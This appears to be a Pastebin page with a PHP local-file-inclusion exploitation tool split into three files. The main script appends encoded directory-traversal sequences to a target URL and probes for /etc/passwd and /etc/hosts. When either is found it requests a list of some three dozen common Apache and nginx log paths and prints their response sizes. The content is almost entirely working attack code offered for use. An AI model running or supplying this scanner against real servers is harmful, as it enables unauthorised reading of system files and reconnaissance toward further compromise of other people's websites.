Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- //Lfi.php - Main file
- <?php
- //LFI exploitation script
- require("funcs.php");
- require("dirs.php");
- $url = $_GET['u'];
- define(LIM, 10); //Limit of ../ to check
- define(RET, "..%2F");
- $toInject = $url;
- //Main loop to append ../
- for($c = 1; $c < LIM; $c++){
- $toInject = $toInject.RET; //Url with ../ appended
- $passwdTest = searchPasswd($toInject); //Buscamos passwd
- $hostsTest = searchHosts($toInject); //Buscamos etc/hosts
- if($passwdTest || $hostsTest){
- echo $passwdTest." ".$hostsTest;
- testLogs($toInject, $logsDir);
- die;
- }
- }
- ?>
- //funs.php - Functions file
- <?php
- //This functions returns body of $url
- function getBody($url){
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_VERBOSE, 1);
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, $ua);
- curl_setopt($ch, CURLOPT_FAILONERROR, True);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, True);
- curl_setopt($ch, CURLOPT_AUTOREFERER, True);
- curl_setopt($ch, CURLOPT_TIMEOUT, 10);
- curl_setopt($ch, CURLOPT_ENCODING, '');
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
- $body = curl_exec($ch);
- return $body;
- }
- //This functions returns response size
- function getResponseSize($url){
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_VERBOSE, 1);
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, $ua);
- curl_setopt($ch, CURLOPT_FAILONERROR, True);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, True);
- curl_setopt($ch, CURLOPT_AUTOREFERER, True);
- curl_setopt($ch, CURLOPT_TIMEOUT, 10);
- curl_setopt($ch, CURLOPT_ENCODING, '');
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
- curl_exec($ch);
- $info = curl_getinfo($ch);
- return $info['size_download'];
- }
- //This functions checks if /etc/passwd is accessible
- function searchPasswd($url){
- $passwd = "etc/passwd";
- $nb = "%00";
- $toReq = $url.$passwd;//.$nb;
- $root = "root:x:0:0:root:/root:/bin/bash";
- $body = getBody($toReq);
- //echo $toReq."<br>";
- if(strpos($body, $root)) return $toReq;//echo $toReq."<br>";
- }
- //This functions checks if /etc/hosts is accesible
- function searchHosts($url){
- $hosts = "etc/hosts";
- $nb = "%00";
- $toReq = $url.$hosts;//.$nb;
- $ip = "127.0.0.1";
- $host = "localhost";
- $body = getBody($toReq);
- if(strpos($body, $ip) && strpos($body, $host)) return $toReq;//echo $toReq."<br>";
- }
- function testLogs($url, &$logsDir){
- echo "<br>";
- foreach ($logsDir as $dir):
- $currentTest = $url.$dir; //Url with returns with log appended
- echo getResponseSize($currentTest)."<br>";
- endforeach;
- }
- //dirs.php - This file contains common Apache directories
- <?php
- //This file contains an array with common logs directories
- $logsDir = array('error.log',
- 'error_log',
- 'etc/httpd/conf/logs/error_log',
- 'etc/httpd/logs/error_log',
- 'home/php5/logs/error_log',
- 'log/error.log',
- 'log/error_log',
- 'logs/error.log',
- 'logs/error_log',
- 'usr/local/apache/error.log',
- 'usr/local/apache/log/error_log',
- 'usr/local/apache/logs/error_log',
- 'usr/local/apache2/log/error_log',
- 'usr/local/apache2/logs/access_log',
- 'usr/local/apache2/logs/error.log',
- 'usr/local/apache2/logs/error_log',
- 'usr/local/apachessl/logs/error_log',
- 'usr/local/httpd/log/error_log',
- 'usr/local/httpd/logs/error_log',
- 'usr/local/php/log/error_log',
- 'var/apache2/logs/access_log',
- 'var/apache2/logs/error_log',
- 'var/log/apache/error_log',
- 'var/log/apache2/access.log',
- 'var/log/apache2/access_log',
- 'var/log/apache2/error.log',
- 'var/log/apache2/error_log',
- 'var/log/httpd-access.log',
- 'var/log/httpd-error.log',
- 'var/log/httpd/access_log',
- 'var/log/httpd/error_log',
- 'var/log/nginx/error.log',
- 'var/log/php-fcgi/error_log',
- 'var/log/php-fpm/err.log',
- 'var/www/logs/access_log',
- 'var/www/logs/error_log');
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement